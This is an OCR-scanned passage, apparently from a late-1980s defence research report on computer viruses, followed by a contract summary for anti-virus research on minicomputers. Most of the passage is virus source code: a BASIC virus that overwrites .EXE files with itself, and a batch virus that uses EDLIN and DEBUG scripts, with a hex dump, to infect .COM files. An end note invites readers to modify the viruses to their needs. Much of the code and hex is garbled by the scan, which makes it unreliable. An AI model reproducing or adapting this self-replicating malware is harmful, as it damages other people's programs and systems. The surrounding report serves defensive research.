230  F=1 : LINE  INPUT#1 , ORIGINALS 

240  REM  **  "%"  IS  THE  MARKER  OP  THE  BV3 

250  REM  **  "%"  IN  THE  NAME  MEANS  260  REM  **  INFECTED  COPY 
PRESENT 

270  IF  MID$ ( ORIGINALS ,1,1)="%"  THEN  GOTO  210 
280  ORIGINAL$=MID$ (ORIGINALS ,1,13) 

290  EXTENSIONS$=MIDS (ORIGINAL, 9 , 13 ) 

300  MID$ ( EXTENSIONSS ,1,1)="." 

310  REM  ***  CONCATENATE  NAMES  INTO  FILENAMES  ** 

320  F=F+1 

330  IF  MID$ (ORIGINALS, F,1 )="  "  OR  MID$  ( ORIGINALS , F , 1 )=". "  OR 
F=13  THEN 
GOTO  350 
340  GOTO  320 

350  ORIGINAL$=MID$ ( ORIGINALS , 1 , F-l ) +EXTENSION$ 

360  ON  ERROR  GOTO  210 
365  TEST$=" " 

370  REM  ++  OPEN  FILE  FOUND  +++ 

380  OPEN  "R" , 2 ,OROGINAL$ , LENGHTVIR 

390  IF  LOF ( 2 )  <  LENGHTVIR  THEN  GOTO  420 

400  GET  #2,2 

410  LINE  INPUT#1, TESTS 

420  CLOSE#2 

431  REM  ++  CHECK  IF  PROGRAM  IS  ILL  ++ 

440  REM  ++  "%"  AT  THE  END  OF  THE  FILE  MEANS.. 

450  REM  ++  FILE  IS  ALREADY  SICK  ++ 

460  REM  IF  MI D$ ( TEST ,2,1)="%"  THEN  GOTO  210 
470  CLOSE# 1 

480  ORIGINALS$=ORIGINAL$ 

490  MID$ (ORIGINALSS ,1,1)="%" 

499  REM  ++++  SANE  "HEALTHY"  PROGRAM  ++++ 

510  C$="COPY  "+ORIGINALS+"  "+ORIGINALSS 
520  SHELL  C$ 

530  REM  ***  COPY  VIRUS  TO  HEALTHY  PROGRAM  **** 

540  C$="COPY  "+VIRROOTS+ORIG INAL$ 

550  SHELL  C$ 

560  REM  ***  APPEND  VIRUS  MARKER  *** 

570  OPEN  ORIGINALS  FOR  APPEND  AS  #1  LEN=13 
580  WRITE#1, ORIGINALSS 
590  CLOSE# 1 

630  REM  ++  OUYPUT  MESSAGE  ++ 

640  PRINT  "INFECTION  IN  "  ; ORIGI ANAL$ ;  "  ! !  BE  WARE  !!" 

650  SYSTEM 

660  REM  **  VIRUS  ERROR  MESSAGE 

670  PRINT  "VIRUS  INTERNAL  ERROR  GOTTCHA  III!”: SYSTEM 
680  END 
This Basic virus will only attack .EXE files. After execution 
you will see an "INH" file which contains the directory listing, 
and the file %SORT.EXE. Programs whose names start with "%" are 
NOT infected; they are the backup copies of the original programs. 


Batch Viruses 


Most researchers cannot imagine that a virus could live in a BATCH 
file. The virus depicted below makes use of the MS-DOS operating 
system itself: it uses the DEBUG and EDLIN programs supplied with 
the O/S. 


Name:  VR.BAT 


echo  =  off 
ctty  nul 

path  crNmsdos 
dir  *.com/w^ind 

edlin  ind<l 

debug  ind<2 
edlin  name. bat <3 

ctty  con 
name 


(Self explanatory) 

(This is important: console output is turned off) 

(May differ on other systems) 

(The directory is written to "ind"; name entries ONLY) 

("ind" is processed with EDLIN so only file names appear) 

(New batch program is created with DEBUG) 

(This batch goes to an executable form because of EDLIN) 

(Console interface is assigned again) 

(Newly created NAME.BAT is called) 


In addition to this batch file, there are three command files, 
named 1, 2 and 3. 

Here  is  the  first  command  file: 

Name :  1 

l,4d  (  Here  line  1-4  of  the  "IND"  file  are  deleted  ) 

e  (  Save  file  ) 

Here  is  the  second  command  file: 

Name :  2 


ml00,10b,f000 

elO 8  ".BAT" 
mlOO , 10b, f 010 
el00"DEL  " 


(  First  program  name  is  moved  to  the  F000H 
address  to  save) 

(  Extention  of  file  name  is  changed  to  .BAT) 
(  File  is  saved  again) 

(  DEL  command  is  written  to  address  100H) 
mf 000 , f 00b, 104  (  Original  file  is  written  after  this  command) 

elOc  2e  (  Period  is  placed  in  from  of  extension) 

ellO  0d,0a  (  Carriage  return  plus  line  feed) 

mf 010 , f 020 , Ilf  (  Modified  file  is  moved  to  11FH  address  from 

buffer  area) 

ell2  "COPY  NVR.BAT"(  COPY  command  is  now  placed  in  front  of 

file ) 

el2b  od,0a  (  COPY  command  terminated  with  carriage  return 

+  If ) 

rxc  (  The  CX  register  is  ...  ) 

2c  (  set  to  2CH) 

nname.bat  {  Name  it  NAME.BAT) 

w  (  Write  ) 

q  (  quit  ) 


The third command file must be shown as a hex dump because it 
contains two control characters (1Ah = Control-Z) and is therefore 
not entirely printable. 

Hex  dump  of  the  third  command  file: 


Name:  3 


0100  31 

2C 

31 

3F 

52 

20 

1A 

0D-6E 

79 

79 

79 

79 

79 

79 

79 

1 

f 

1 

? 

• 

.  n 

y 

y 

y 

y 

y 

y 

y 

0110  79 

29 

0D 

32 

2C 

32 

3F 

52-20 

1A 

OD 

6E 

6E 

79 

79 

79 

•  2  , 

7 

7 

r 

• 

• 

n  n 

y 

y 

y 

0120  79 

79 

79 

79 

29 

0D 

45 

0D-00 

00 

00 

00 

00 

00 

00 

00 

y 

y 

y 

y 

. 

E 

•  • 

• 

. 

« 

• 

• 

• 

• 

In  order  for  this  virus  to  work  VR.BAT  should  be  in  the  root. 
This  program  only  affects  .COM  files. 

End  Note 


All  these  viruses  can  be  modified  to  suit  the  needs  and  the 
experience  level  of  the  manipulator. 
APPENDIX B 


A001 - SCIENTIFIC AND TECHNICAL REPORTS SUMMARY    SPECIAL TECHNICAL SUMMARY 
Contract No.: DASG60-89-C-0044 


I. The purpose of this research is to create a front-end product to 
prevent/detect/discourage computer virus intrusions and to enhance 
correction/recovery mechanisms, so as to prevent damage, downtime, or 
inaccuracies in minicomputer and higher-level systems. Although there 
are many personal computer-based anti-virus systems, we know of none 
for minicomputer or higher-level systems. 

Problems to be overcome will include system compatibilities, 
communications/protocols compatibilities, system entryways, and 
mechanism/method comprehensiveness and applicability. 

II. 1. Analyze information on the hardware configuration, operating 
system, languages, utilities, communications/protocols, and security of 
CDC-Cyber systems, Convex, Alliance, Cray, DEC Vax, and DEC 8800 series 
systems. 

2. Choose a system for in-depth analysis and breadboard testing. 

3. Research and list generic viral attack mechanisms, such as those 
that attack/corrupt CPUs (Central Processing Units), memory, storage, 
backup, et al. 

4. Research and list protection/prevention methods for each mechanism 
in the form of a work breakdown structure/decision tree to show any 
interrelationships between prevention methods. 

5. Decide on protection/prevention mechanisms: 

A. manual mechanisms 

B. automated mechanisms 

C. reasoning for each 

6. Compose a raw code program for the front-end prevention/protection 
mechanism for the system. 

7. Report and demonstration. 


III. ANCILLARY CONSIDERATIONS: 

1. Evaluation of user-friendliness as an aid or hindrance as it applies 
to unclassified, confidential, secret, and top-secret systems. 

2. Generic applications to minicomputer and higher-level systems and 
environments. 


3. Consideration of a viral cyclical redundancy check program to warn of 
infections and halt infected program execution. The program would be 
free-running within a system and is similar to the early NCR Century 
series Operating System upgrade architecture, i.e., a benign VIRUS. 

IV. The anticipated payoff will be an anti-viral, front-end protection 
mechanism/method (along with possible complementary mechanisms/methods) 
which will protect USASDC systems from viral attack and concomitant 
downtime. 